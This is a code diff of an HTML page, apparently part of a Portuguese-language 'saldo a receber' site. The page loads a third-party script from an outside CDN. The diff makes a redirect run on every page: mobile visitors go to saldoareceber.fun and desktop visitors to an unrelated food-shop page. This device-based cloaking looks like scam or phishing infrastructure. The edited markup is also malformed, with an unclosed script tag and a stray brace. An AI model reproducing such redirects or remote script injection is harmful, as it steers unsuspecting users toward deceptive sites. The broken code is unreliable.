--- a/Códigos-2/index.html
+++ b/Códigos-2/index.html
@@ -656,18 +656,13 @@
     <script>document.addEventListener("DOMContentLoaded", () => { document.querySelectorAll("a").forEach(e => { let t = e.getAttribute("href"); if (t.includes("#")) return; let l = new URLSearchParams(window.location.search), r = new URLSearchParams(t.includes("?") ? t.split("?")[1] : ""); for (let [n, i] of l) r.set(n, i); let o = t.includes("?") ? "&" : "?"; e.setAttribute("href", t.split("?")[0] + o + r.toString()) }) });</script>
     <script
         type="text/javascript">document.head.appendChild(Object.assign(document.createElement("script"), { src: "https://cdn.atomicatpages.com/a.js?cache=" + Math.floor((Math.random() * 100000)), async: true }));</script>
- <script type="text/javascript">
-        // Verifica o domínio atual
-        if (window.location.href === 'https://saldoareceber.fun') {
+ <script type="text/javascript"
             // Verifica o tipo de dispositivo com base no User-Agent
             if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
                 window.location.href = "https://saldoareceber.fun/Codigos-2/index.html"; // Dispositivo móvel
             } else {
                 window.location.href = "https://www.livup.com.br/ingredientes/maca"; // Desktop
             }
-        } else {
-            // Se não estiver no domínio específico, não faz nada (deixa em branco)
-            document.write(''); // Página em branco
         }
     </script>
 </body>
